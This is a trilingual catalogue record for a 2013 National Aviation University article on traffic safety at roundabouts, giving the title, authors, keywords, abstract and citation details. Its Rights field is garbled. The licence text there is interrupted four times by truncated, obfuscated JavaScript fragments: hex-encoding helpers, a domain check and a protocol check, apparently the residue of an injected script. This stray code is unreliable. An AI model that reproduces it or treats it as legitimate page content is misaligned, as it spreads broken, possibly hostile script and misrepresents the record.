Record Details

БЕЗПЕКА ДОРОЖНЬОГО РУХУ НА КІЛЬЦЕВИХ ПЕРЕТИНАХ

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title БЕЗПЕКА ДОРОЖНЬОГО РУХУ НА КІЛЬЦЕВИХ ПЕРЕТИНАХ
Безопасность дорожного движения на кольцевых пересечениях
Road traffic safety on the roundabouts
 
Creator Степанчук, О. В.; National Aviation University
Васюкович, Д. Б.; National Aviation University
 
Subject
вулично-дорожня мережа; дорожньо-транспортна пригода; кільцевий перетин; кільцевий рух; перетин вулиць і доріг; транспортний потік
656.13

дорожно-транспортное происшествие; кольцевое движение; кольцевое пересечение; пересечение улиц и дорог; транспортный поток; улично-дорожная сеть
656.13

intersection of the streets and roads; road network; road traffic accident; traffic circle; traffic flow; turnaround
656.13
 
Description Розглянуто основні питання виникнення дорожньо-транспортних пригод на вулично-дорожній мережі міст. Показано, що ріст автомобілізації і невідповідність центральних частин міста вимогам сучасних транспортних засобів створюють передумови для збільшення дорожньо-транспортних пригод, а найбільш аварійними є перетини магістральних вулиць районного значення. Проаналізовано особливості підвищення безпеки дорожнього руху та зниження нещасних випадків на перетинах вулиць і доріг. Зазначено, що для розробки комплексу заходів по підвищенню безпеки дорожнього руху на перетинах необхідно знати ступінь їх безпеки. Визначено, що перетини автомобільних доріг значно знижують пропускну здатність, створюють значні    затримки транспортних потоків, у результаті чого вони стають місцями підвищеної концентрації автомо-більних викидів, шумового та іншого негативного впливу на навколишнє середовище.
Показано, что рост автомобилизации и несоответствие центральных частей города требованиям современных транспортных средств создают предпосылки для увеличения дорожно-транспортных происшествий, а наиболее аварийными являются пересечения магистральных улиц районного значения. Проанализированы особенности повышения безопасности дорожного движения и уменьшения несчастных случаев на пересечениях улиц и дорог. Отмечено, что для разработки комплекса мер по повышению безопасности дорожного движения на пересечениях необходимо знать степень их безопасности. Установлено, что пересечения автомобильных дорог значительно снижают пропускную способность, создают задержки транспортных потоков, в результате чего они становятся местами повышенной концентрации автомобильных выбросов, шумового и иного негативного воздействия на окружающую среду.
The growth of automobilization and the noncompliance of the city central parts with the modern vehicles requirements create the preconditions for the increase of the road traffic accidents. the intersections, of the main streets of the district value are the most accidental. It is noted that to develop a set of measures to improve road safety at the intersections it is necessary to know the degree of their security. it is found that that the intersections of highways significantly reduce the capacity, creating significant delay of traffic flows, as a result of which they become places of high concentration of automobile emissions, noise and other adverse effects on the environment
 
Publisher National Aviation University
 
Contributor


 
Date 2013-07-01
 
Type


 
Format application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/5418
10.18372/2306-1472.55.5418
 
Source Proceedings of the National Aviation University; Том 55, № 2 (2013); 68-74
Вестник Национального авиационного университета; Том 55, № 2 (2013); 68-74
Вісник Національного Авіаційного Університету; Том 55, № 2 (2013); 68-74
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ